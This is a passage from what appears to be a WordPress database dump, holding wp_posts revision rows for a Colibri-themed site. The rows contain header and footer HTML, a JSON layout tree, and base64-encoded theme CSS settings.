d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',25,'https://gsudice.dataconn.net/?p=1871',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1872,1,'2024-11-07 14:48:27','2024-11-07 19:48:27','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',29,'https://gsudice.dataconn.net/?p=1872',0,'revision','',0),(1873,1,'2024-11-07 14:48:27','2024-11-07 19:48:27','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',28,'https://gsudice.dataconn.net/?p=1873',0,'revision','',0),(1874,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','{\n    \"colibri-wp::page_content\": {\n        \"value\": {\n            \"options\": {\n                \"css_by_partials_id\": \"base64colibriH4sIAAAAAAACA91dy3bbOAz9Gi2ZQ4Dga5nHf8xxHKfSqRX31O5M8vddyEmdWLEkkEzBWXhjCzbuBXgJghLd+JsGEXWD2Jjrxt80iNvderVVqNUa3r3-sNl-P+x+HN9CbBAbvG0Q+919t92cvG-Wu213-7NrUF-tDy-bjTr9TrX7ddj8bFA3-qaxt08N6gb1f93DoW3MdYMatG7QNqgbc3LB43bzPHyuj6-Vr8Pu3SWq36vLl-m74Wps-N3g-IlnVAAtiUUbCqANUtH6y2AvgfKTmOwXQFoeDL88FpcYJD6DVCmDlJdBy2fQVsqgTWTwlcRBkD5MUKhadExOUbXo5JB6WN1vN4d8jodPSV0Yw3k-N38YoGoxJsQs1hqz+LUxi3ljZiYLwXMb4of5E+HNEsWPPJx91q+e1TlPGYIyiQqOL30B0p9rxpw6j0KCQLpS-i6h+RyR5yPyFeTVOWAwfMRgJARx+Vj5zO+-vJJA1ULCiAJXaTScmGi8VYR2pCK0-FnH1jDrnHrfqqfVv9231aHbPf2zP3Tr7y8XQd1OmldIyOJktl8wDUuLUvaywvLLCiuzrLCqDXxE4f8oHCEhJUN9dZZVbfb+r1Wt0P6vVS34Ami9VLSYIFiSGkWLwpHcuXkrtsJIsRXUI7fYCuqRxFWUBs5BGlB9ZlUwoHphovDw8rTqu7UyoPqLTeqrfXfY-AH0zk61m+5be-iIqe+eXj8x1w1qo-WP56kRa0D1zGW+AdWLVCEDqgdY1kYzoPqp1f+ojWPYhOU2CPwgIYhQ1RFQJgGUEQrKJETKgDytphGtpvxaTXK1mphaTbm1mvhaTVK1mqZ19xIoECkDpHqwCaCsVFBx4cxF0zPXqM2cmfhNofyIQnnVm8wK5VVvxMkzjdxPRjo7eNKSwJ9kC+kJcb6MyUrFtLQWJa366a7KiI1j2ITlNtMqsDwhUV61RGZkOBq1Zy7fyai9vOU7uRGQjg-SSQQJYzdCASL79rzBtsL+1kzHZ9-lAohqHRJIDLWSOO14XMIhpJAI1bIIuWmMKTTGammMmVrWgG5MKd30Qw2f++dmPb0gkdl5ns9PUKfWACk0QrU0Qs45x6k1936io3G1PLrcPMYUHmO1PMa8wxpDAo0YaqURQ+Z0NCnyaKqVxxmeL0pHQyk0UrU0UmYabQqNtloabeZRTSm1I1VbO1Lm2pFSxJGqFUfKXTuST+HRV8ujz8yjTclHW20+2sTJ+m2tHca6kgHVGmzmDvvrt0rcITn6hsv2IY5W3JF8tF78dKGAFJzr+vyxHFCtvS2Qcd6KTbhQYoQFuQMs+BJ4vVi80RTAG41cvLEE3ih3wtAlBAu0XMWC3McKvX6rYMSuCGInFzFiCcSIghGHIoiDXMSGSiA2JBcxFVEukqtcWCSrUXBWY5GsRsFZHTgrVu8YRpE4a2OtWVYcB2HpEzpHK8+xQsOyihwrYzlWxGEDWR4iy8MQWLCSmi1Ub7OFcjdbwBXp7znB-T1XpJR3gkt5XyTGXnCMfZEYe8ExLtJFBMFtRAhFYhwExzgWiXEUHONYJMZRboxRl1igoha8QC3SPkXB7VMs0j5Fwe1ThCIxBsExxiIxRsEtcsfaNw88K9Z6PbJ+K3J+CzVr5c3qeSCr54HA+i1k9VccK16eFS-Pihf3fKlX61pbCpjzdHAI0w8ysrwUvKNQZENBsswX6Z4InsiLzONy8RbZLpK7W1Rks0jwXlGRDVDB+59UQq9Irl7ZEnpl5eqVLaFXVq5euRJ65eTqFWdTkbV-ydq+ZO2vEmeBYjl7zZZDhGPtNLOWhayVGocIDwmruxkbXUIXdx5yHcYQ7NgDIpZ-bE2wc1Z1xlwZI49am-fkmmDZ-2842FbMo8+UoURx5PgoiuwMHWzlnZJlx84Cs0atIffhfMOXijzKzpo5nYgRIyrAEYmlyBVA68SiZR58MdjOmOKvnLh-Jpzpu8-0z4Qzf26eYjs98qcETge2Yg+28o78s35EssF6w6+eBmNJUP3db0JGLUOKfAAA\",\n                \"css_by_rule_id\": \"base64colibriH4sIAAAAAAACA+1dTZOjOBL9LXsgomoicAiBEByrq2ci9jSHveyeJmRbtjWNwQGq7qr59XvAdoMNWGkEmOqMmOmucWn0kcpMvUzlkx3+xaHUDxxKHf-F4V8cStey+Kazw-EjSh1KHfrqUKrFMpH6+vN9tlSJrH3Ov5a-8ll3z-4qS9QyVw4li0J-JNL1mUOJw7847DV1KHEoEanaC62y1F2-5UKrLHX8F4cSsmCF41caHsR6rdKtq7ND2YKSw3tji1xtd7ps47GWNstM62x-o6NEbtr6WYrVt22evaVrd5UlWV4207lIi4PIZarbWqu92MqydZql8tSMfy1bV0W2c1PxXW2FVln6V6HV6ttHXZKvN9u3ir15-g71N5vNZrMBzr55gzxiIPyrRsvs3S12Yp39OCrC4f38Z1D5Od8uxRNx6Ov53wV7dii5lChUvU2U9mqpJiuttBl7t23Nt2L64WBOhYOdCr9cr5bv2hWJ2h6dyUqmWua1Fe-kTy8h3nRW++VepW61wVtaSN1XsSpLjMBLjI6md7HQvXivTZTfULJTbw4liyTbZq6W7-qy0wuHEG6ijTDsVFypaeWXkEGvvZCW79pdy1VWPSWunNAmS7VbqH+OTooGfYzuLHRz07O0Tzfm1Sjp2--PxQYAVmU64J3bTQghhMC224IZxmAzjGfmaQICXWJALpdYnR5rPBTunp0Hnp03tw2g4CVShxLH-72c3lp9P--n4tjW3cv0zV1lqRYqlfn5929JrYVDSaIqvyw7rHwkzj8V37ctjnuK2TiULESeZz-cH7k4HMo+W5xHvl0+UVaiI1L94fn2iTXk2hK1WL3luUz1XwexlX8pLfePI3j-97Yp+i+77Huls6mnaijHS32Zh0hnp+XT+o+7-UVDYoDdDPkvW1S2Y5mI1bex-csD+ZOH9h+P6S8G8A+fQKtPUqn6Uv-F8V+WcpPlsguJXmYwfqi13p1SSsShrCEVNP5irsLAfKvSxjTMCHNcFFmi1q5YafVdujXLSFQpd7HRN8zhvJbqP-CBmje4OSv5Y6e0vCcjuczytcxdnR3cinpcJxzPrQr9kRh0lsiNdnOxVm-FsUuHsrbGudruzFqXLW-PtGxnMNcym2fQ47GheZfGEji2NxdCIjcmMkjkplUEY5hSOQ05ijUZjQUxqHy7fIq8EkR65IQmCX++x8iqTtkf1Z91wPD6YcrbE4Re0H4g5tvlU0hK6YRHKUWBMeQePtY444bW1VqNIYbftQYo9PoLCXj00PRR5Nw1s4pO9LDjh9yY00f8rlvUCu6nd920XkcHtAMbWUNQI8AcrxPm1FVDPHk0cuhr9c8FfTaDSUWWqPVAMObGAd6t0T3KDiZysUbVCT7xJRcPeGC9flYZjpnWfbAzqOXkQQ+NHhpuZ5Yc8kBGMHBp2DHv1ZGpPLZoT1R2lYWxw7tDCa2XhZU5hupfCxI8T58VbI5IN2Kvko9yaX8eZOpQ8h+RFte1LT8q4XbYVDOhc5EWmyw-+pS3w0HmK1F0lslcoedEpbJ2Le4tmNzXm0itZe4WB7FS6bbZhu6rJLLs8e+P5jpzJKPPf6ro+LPIb-r4t3e8++m9RG+tse+0De9vWs452tKkpdC2+SxsBY8gCGoJgZKxc7xdVjOx1bbYKqrJFGpS3YG-3wqtNh-uKku1TI9T2iTy3ZXp+u7C24e4PjKYof1bJePK30cV0QPcutkMCcdR05bwZXxlMIqjLmAEP4KH+IgmKH3uKdFxEDVQuhPDfKN84hSyNYiWcMt7yQrV0HbQ+XATbLveGF8beorx8eJ5E+XtQTvxwbQT3802m2KVS5ka4xlK6Rc-uCcjXEm8+8cs7r-U-pDlWqTaIHCozPbP7zJPxIdx6VMDa9hajt4-lqPv3J3YL9-yrcxdtcpS4OQactfe8ygVkG31wB23SK03LI2lkh6wWNKzVC5psrCr+6zWpUErK01GB9xdtVVhevA6TM9KJabJ+i5v0q5Xt1FJ0lbye5XLYLdTGSaPP8BL5isioZcZ0WoytIl73MOjD-aKR8AG6zkEn0Lh3Pid4NcKAm6Tyh-wrusLPjzrHg60OZhVb0tkN+Z1BybnPVj15gPeuZ3TsOqDaDB3AubrB3Pj6zMwX58R54Ho4lPMBkKkbccVJrVazVct7c55SGn0JoSyyYvqHmKqNgmjDyfSX8AupvVRNinp9I7qTzh9166OPpAPemif85g+ZhxS+hz1ekBWoUFqw6MmNRj0pliD3sXi9YAiIhGJSJ+U4N05u87R++TtjAvRO2cwUN256fCdqbVpbeaOqktGPgPrEO0c7fwT2jmehWgjn9dGHoF0MMVM8LhDU56pKfdItntD3VQwOljP-mA9D3bBzAa7YGaDvULPwPe6jHc9Vwe7SLpJnhygzLzHdzgws6wvdyjZeXZemy87ozY78212FtjsjNnsLLTY2eGevnoY5WBXywx8tcxiN3vT15CpcgSyi2coS0iVyPfzC3iENLkGd1+43c06tmVuN94hGWpPaQguP6JhaP4aQqdDvlE62mdVHL6qq6PpclO91i9KOp8EvslJ4Fv9fgAaRsMpR6fFnyUX-4y8du5HQ8D1m+O-pJl+cvyXRBTaXe1Usn5uYYQCvg6oNoEZ2TPlwxk0H660iPChuo4o+Nt+IhpZxpKtXuwP9sfLH19H92IRjQeTt08MLDvyyWCW7RmZ9nEGMzLtyAd-X0vke82lm9lBrJQ+PmXhTfNqs9-V6XWlvN+d1Znnu83+ja4BYhj05ebI99ysheiD+oL60qQvK3HQ6pp7dfk6h6m79txNLvby303u7B9XpetTxObW-dnFUzs6F2mRCC3-++QRh7Ln6mf-O33W2IGb5Wqr6odD5Qdi9B2l+Xb5kwD33Hq4NPCCur5iocMSPbNEfMe8er5e6Jlm429Poc+LhwTw5OGNaZjb8aWReYZ5+dtzMLHLPliDwrEGdShZaPmuT9Vp7kakq49TnR85CL27tNxC59k32cWZKFu4iUrl39nJ+lSqtBJJW8OVONxsV9mVyGbUHPk+XHR+89Xfz+1VWiRqZeIn-abEYL-urh+pTFRx7M-VH4djp2tVGHeZGXYpV2r-c-9s7A6D7w5zKFmoVZbWwxTeyJ3Mt8snL-RPb6eFp8ehL8y4SmMsCdjtTEbDE7Jpmm03y+fpAl4kHm2EIlspkbjdEr-9qOlDcFYtqGww2HVmBH+oIAr8ucXNt7i7TYsM8CxzKI3gFOLomkP82ZJnwXDJym725lnE0dTJsyCanROI4ZocY-IMkyEWkiFBjMkz1BeQvthNngUxJs8weYbJs5GSZ-BnJCJGMOBwKI0Y-I6TedayXcyzmjxjnvXkGfOmTJ4xeFaYUfsyoJPKAJ4yYf4sEoiN07Sa3htrBEwg1lUWngBjAca+GMtYiGVYgLEv6gtIX+zGvizA2BdjX4x9x4p94ffrbB7362zw2++xRkB4XFdZ+CUnCxEeI9yxAXdChMeoLyB9sQyPQ4THCI8RHo8Fjzkca-B5wGM+OHgdaQSExzWVHe6JgCiE3-aF3twqz0L4pVmIVIpXh9KYgPUjJtbvXMsup7pvjAmFy4Dal8GUd66xBy6oiD3yycuQY2+w99NijxqUIccenbgM+TiDGR0GsefDNdnHXBPmDvrnDmLPx1wT6gtIX6zmmmLPx1wT5pow1zROrin2AjjWQN5jKToGFx2zVTdcdnWw253dcNBjk4aDHL47s0iiNk-TZopztBEwiVpX2QiushHGfYjjbeD4COM+1BeQvliO+yKM+zDuw7hvrLgvhmONeB7wOB4cvI40AsLjmspS+AUfJQiPEe5YgDuUIDxGfQHpi114TAnCY4THCI9HgscUXlRGvVnA48ZpWgWvY42A8LiusvAaQEoRHiPcsQF3KMJj1BeQvliGxxThMcJjhMdjwWN4hTL15wGP-cHB60gjIDyuq+xg350eU3ghGGVzIyXQEL7IEAsFHUpjDr+44BaZSTZWMByNiBvRiPjkNCI+OxoRhx-SHGlEGODZCPA40ohQX2D6YjchwJFGhAkBTAiMlRDgcBoRRxpRKTp49Mjt0Yi4XRoRt08j4pPSiDg87OWhfRmEk8oATqXi86BS8cGJTmONgNm+usrCqVQcqVQYy1iJZZBKhfoC0xfLsS9SqTD2xdh3tNgXTqXi86BS8cGJTmONgPC4prIR-EYyQioVwh0bcCdCKhXqC0xf7MLjCKlUCI8RHo8FjyM4lSqaB5UqGpzoNNYICI-rKgunUkVIpUK4YwXuIJUK9QWmL5bhMVKpEB4jPB4NHsOrtKN5UKmiwYlOY42A8LiussNRqSJ4MVw0OypVBK8pi355KhX-+n8Q46FMKxcBAA==\",\n                \"global_css\": \"base64colibriH4sIAAAAAAACA+2dzXLjKBeGr4aqpKtQySDJ8TKdzPpbfBeQwhKyqUbgkfAkmaufhWRb-waBiSc9iy63E3jPewCJBxRJACEQv5QgfhHBHn7CVApFmKAlQCHAfwAU-gD4WUj1APAzJ5WC6Z7x7BGgF4DCYA8-LlUgE92KKATrnyB+EQCFAIUFKXdMwK1UShYAPwMUovDwAXBdZv3auBiRbIKlkh8L8faWSqGoUOdQ3Uod6xfPGnagrp+pFA8ky5jYQU5zVUuuWoqdIiXb7UfKzEcd8X8JBQexmiKtUHAYC8Q-U06q6gfAr5X65BSC+LVu8vavuEwJh70CwR7uuNwSDlVJRMUUk2L6N5Bwfu23wzZtlciOJVFMijqXMIirXrO9H+CWy-QX3B6VkgKgsP+jtzfOxK9mTAd7UsEtSX-tSnkU2SNAL5fyOeO0I5AzTt-ezsodkxcRmEouy9ohQBiHmK5Jp1daZVlBdrQuK6SgjrPBz3v5Fy07WS2WymV6rNxIkVSxv6hBY48lcq3G0O+1GidbOj1b7rYP63oso039uULo0Uk-B6xqjjN5VJwJaj6MuymYjMhWWVUSUR1ISYUyzKsuJsuMllDJA3xnmdo3Z-zeKapV6rrNS9lKffImcCU5y8bKlWy3Vxqx63K60evSOvHrmUXDQFNQ10FTXMcCp7lOC3Ca6zcAp-l0-rca0dOnMhfaU+c2F9rjZ5VuY+d5rnE8Ws4mXWuNMHr5cZrkQfwHwK8gfgEInXOsv4L49dIUleTsXN3DLLgnFUwlZ9uS1apwNZLHHU3H39XxApzQFTaGC13hf9+cvmj0-DfD-zfD-0tmeNtzjftI9rO-3dnIPwvozvl6pyJdhAAodKw4CiWjMRzRzpbL9NefR6no10cJD1+GX8Zz0KQWWg5G+ZrGm7V3MPoWjt2gHLoVyiEXKLdKUANxcVj-Z7O5A5hDhjA3P2juBubGbPqDuenovmBu2oEXmJsO7xvmkDeYQ95gDt0c5iymhuUwh5zDHPIAc8gLZnmOYgBzNhQx50B7DprUwhZolCSrZOUdjb6FYzcwh28Fc9gNzK1qhkvw6fMOWA6bstzsmLkflhux6ZHlJqN7Y7lJB35YbjK8b5bD3lgOe2M5fHuWWz4zLGc57JzlsAeWw14oy3MUE5azgIg5B9pz0KRWtJyMNjTdUOSdjL6FYzcsF92K5SKH11hXUdJcbEXJHbBcZMhy82PmblhuzKY-lpuO7ovlph14Ybnp8L5ZLvLGcpE3lotuznIWM8Nyloucs1zkgeUiL5TlOYoBy9lAxJwD7TloUiu22eXKn3L-f332LRy7Ybn4ViwXu73ImkSn-8R3QHOx8c7c3Ki5o525oU2fO3NT0f3tzE058LQzNxXeN83F3mgu9kZzsYeducVzw3Kai53TXOyB5mIvnOU5itHO3HKMmHOgPQdNaiXL2QiFiMSRdzb6Fo7d0FxyK5pLXNAcbmAuaj6fojtAucQQ5eaHzN2g3JhNfyg3Hd0Xyk078IJy0+F9o1ziDeUSbyiX3BzlLCaG5SiXOEe5xAPKJV4gy3MUA5SzYYg5B9pzUPOcDYQbJYDC4F3KVBYFLVMKKyVLCoVULKUAvVwKtksBFAaX554Ee1jRtH7cRsjE4ahA-FN9HijAr9VxWzB1ekbHmBY8kB2tfU9pDmUbJpmRdSyn4TI4gZK5o2tV9dqIWDjQqa7hojldL-ehJ6DhhInDUVkY0aqv6wMg3BwIi4+oqwoaXkhAsoxmb0q+paRcZEZXQud4OTJYcZbREpZE7BadbbQ1zPzsici4raGTyC3vi5uB--ALb30Ov-rW5-Crb30O-dz6rDmPXxheu8IJxbUrnB+k5A4Zxmzbaw4zs9e8krwl41xrB2v5+Saxll8+NGxa5UatcatWMCBMB+MhGDybzIHU8n7WzcxBRi4yMeRxN8cvcdhnXTmr45M46DuT7FxlZbyacdCLfUHrfuwLLu9Js1yd5eguN9M1oYPu7OlZ92ZPz5KoHPSlUYLOEjNfVbvqy7aim95sK9oSsna67tJ0mN6C-QkH3TqUtO7XoeTyjjXN2GGmLjNcstvjAmKHmvY0O9S0wFrTpF0m6zTJRftnbrv4LOqyj8+iTjpZM2+n+S7M099DKK33KLVseNqxNPDiZf-SwM-tdzMNzBjtbZoe3pUiJSyJYmIH8DPAz1uay3LZwW2qZeoPhdWBCKc2xyRNH4+3PLlDufDK8ammd6thRrmV4YzyGdvlbvvw1BwOm3h4WNhmIUVFFl6sOlW9-aMbrdNzwRJnKXuCOEtZcINmZg4yMsrE9+OpJy0feXAoZXZMVQVQyNnpG0DhHl2azd-5olecCXI+E5AdheJYbGlZBemxLKlYdHndVQirbEgnltX4NI5xz2eiVBYFFQrmsiwuc21QKVJWAIVkUQtdFzV-su1J--Reo+pA0lp39AVRSh5qwc3U+6Ha76XaDF-a1LlEfPoLNU7E7kh2FFbvTKV73c593zNFl6wwzlk8zawq9NYeLS6dW8hwmitYkowdq7pwNC1ZLwbahWdXHLorEw2nposLfUnd-Jvi2k1gsvqYcGs6MANOxA4yRYurB8kq0niJ2pPGgTQp1Hph21P-WNvK7LNvMZdCwZwUjH-W1f53oAKg8P9EVJ0AuRQKvtOLzygMhwUq9nfToquk55AzQeG+JbAKkk6BHiKc7sN9OmFvsnkczYfcLidFPxTMaCrbr2sbjOx+5rS4lng8lThAOMRkk0ejmR40Xv03aPdv0MPBHnJKMv8tgK+0QIBii84ud9uHpHmkdxIP7lTqNMHlj8l-43GwX91V9+MArzX6H80mP3OrWjd3dFe5oyDRGfurCDtJHt9Z8jq5o9hJ6pHf1BMXpzw3Iz6+s8xXWmd7N72e3Ffut+7y1ir3zNoFYQI2P4QVE7v6racFYeKyCH6Zr0bKdF9vTPXq3Wo1uzCNywqjYhndkjLYcrk7fWmWB8uT1VLvNkn7ZtQYoBig3gjh9KNZYjX-yFHJThFYVFCjWEE+4CBa783O9Zu9z59RWNCMEYDCh4KJdu118nT4eAQoJCIDKHzoia9ChA8fj3Wmpd2OR6IzRpLfZIxgHGDsc5icA46PlN7X9oDp6qyTtasBgXUGBP5NBsQqDH0Ohybc7GBA6B8BoRQmJoAAAA==\",\n                \"sheet_rules\": \"base64colibriH4sIAAAAAAACA+1dXXebuNb+Naw1c0EW2nxfEreeybztdKZJp+-MzVkyyIYWIw7IdtJffy6c2Bg2IGycOBNdNRUYSVtbW8-+lAag2deae63ZEw0gibb-amZgWhpMtv8TDznbtW--iHmux4xGrHh88PRuxiN2E9XetizL1GNSe3Vde4tcEeRjZeWtx1ESo-kxsPdt9jvNfafBBJ2WvftJKR7SyryeXqZZyErBi+aTUiTh94dm+4yG3xcFX2VR81nI0+qnHgdtzufz+Xz++N-tYO2JBpDTKEqyRfM7gufNxpyKuPbtNU1XrE7oStuO2Eaz8xkXgi-P1k2lpyWLEtrsaMlnCbYkz0aV5yHKIU0OKTPj97cxjfim2SPL6Cxlex4TxYrtfpfSB1Yc7pUd2+YFo1HLGHb9pqs6m1r7YdrISJ9hUcDYPVhliaj9Pr8-82oN775IFrFo9o7uDLvWt2QXKZufqQe1P2X250BZLwqalTktWCZQSrecrRldJwsqEp7VxpsXPC+bXfM1K1Ka47Khdm4hz24FLURQZ45kuWRRQgVLH2qjKGO+ueP5Nd1Pd07Tcv-ZTRI1yD-j9zvpVRFbfCXumkRI+YLrZU7DJFvoS5atmit-En4ABD-AHj90wpnq79uBhtO3ZiHPBE0yVnwdRCzkYPjviqaHHzlcjUSwZfkHKz5XjhWyexrzIvnBM0HTXyoctJd9a1aIJGx7uv-1TZaxovsTHa+EqxLdx-jodo8lpSY2h6Hf6JjpscM5+kMnies2PsJJDZ1ExKVki1Qrdvx38h529disvUmMZhvY+7ZOtcDt261Pkw-SZJHVRh2yTDQ0oX4qH7dhpCgd8nS1rJ8dLQpPxMqQZRHNBHawrPYzq7LWSAABRzOnoS3JX6PY5ESYKbVr5ZH0W6TOKKe7hYgBa8DpbvWe7l7fDkz5gstht71AuGP3ApMvFT44UuQP6uNwIVohmmD3YmRUZiPrZjfX7RhBlvIF1ytDrmopDzlfFDSPH2TtN5bmXouYLdlVyFNelFeW5r7D8f3gHsvkBxu2d7p0maoWj8me1i1g924Bv289hqmF5xUu3erzWUVqTdiPBC-iJGK9+18UK3YCYGhlDmdMU66DbHpHArNZRt+kypyGchZqV49db0Rs6iLY1EXm6crMk4zGPOMCR9FylKD8OvDAkvq2glHnhVEewrHeABjl9Z0hFvQ6mXbApWoFOgUIJIIhRF3SYpFkkkdVl9HwfBbjY7to46MRZyFvlB7aw9EOh05v1DkWyTjnupAzLowxYC2qn06y78OQ7YYd0tGeaACOUZ-auACYWIhULmhWznmxrL27ynNWhLSsOwnmdJmkD7WXP+Us08C4pVlZt-wkGfuVSZ8bO3HUOY0rG1tdIVhxu7WSj0cyxMtylBq0l9JUMFTxXWO2pRHUMUNzJ2taJDQTRptmtmTZ6nolBM+CUCRr9uwDORxOuZpVDrhqdMH4HmHE2VvXvLH5FYsZ-cnQYKKBUfvnyrB+RtzFtcnp+Nk71KdWLGY-gW1vu67+8fPJvDc8lANb8mMZ7hy9ty+EjkvwM+9WmcU76y6VHMChqnSqHLD3cgDa+KNczT6ybHUT8uzZyRzzNSt0Np+zUOgzXkTn2xy9gjnJMlZ8RGXht1UpkvnDhGdi71B-6m6esnud7QZ3+NHhUV3d1sRBW+e5jpp37Wv7PF2Ou2kqzGJ2Tu55GPddvyOnzcC-ZsX7+ZyFuCmYNXz-RcQKFuk0FMmabU9NMLBmXT-QInbcHopkzX4p+CpHv117fXH44h554OQUBc3KpBKcskOy1WUo9UXBNxoYi4Jv9HnBl3qH8QaFMgfneEcMS8w3n+bzMiwYyz6ybPWpPrCYljqfz0OarWmpCzpL2diuCx+xlfgDbCV+r63E7LOVbG1pmJ0E75XosWmOaPRsKKnEQBrBrjR22j17I5D506LrOc1YKj1pa8xJE2zSaHiyTHyyZQ8PomifqDPmRLF4C4IFXBCZiAvLGdElQfTYdMecq4XNFfMqE0tmru4R3uL2mY7pqGgEiRIDaQS70mj3HniSLuN2enljbgJ-THI5GLkwDxaRcmH5424CyxhzrpgTi2BeLCLjxrKN0-z3g82NGLLbxIlgbdpXn2Y8XmdJyLNP+SGCOsuUxlMom91IYd96FNwjPA15Ee1n3++W3P1iGLqxx9wOgG0HLI6YgMx2IH1zFjzXZ7SQCyLqC7geA+a6ekx8jAgY9iWeDBF6XXlDVbdZSsPvp+ZVYUZxe1TX0dHeDPs0P9KoSSdjTOIoISId+K5C2197aPt8labXTRlwoP+PHAo1bpQ6YEoxoEqxLyMxzQsNBlLRN1joZ3+k7Sg8htkgALNBgIzhxe41vCQhz-Q0KcUI8ThpMoCZXjIS48g4iShZJ7hVusW8im+YGsDDh0iOCKtpm7xUh0fSJGYy60iMzs9rYKMT2uXVvWuj-Pjdt+Q9nrhKR0Y21qcxtDsJTHyezGhyWTs3QRXnliU+pUiC15zYPEnTQfE2RwY8HN3PEUEb9Cdz64Ymjv-oj97a+MEwfh4qKkamd6uvC9sLtWPu8XTO6n0XNEpW5UUgoqEi6hExHKctHuVS7ZmfJMkvfHJt4kox1PlojhPndfPT0ZatZ1G7zpKidWq0+p5enedGM44FTeBrSxfAx37CWdUGcYeG48qE5Zwv8LoeOV6KllDQV6-4NS1qmAmgFLQQA42gScizD3uV+zCiVySiIc4+NPVz3K+Vsc3XJKtGGB9a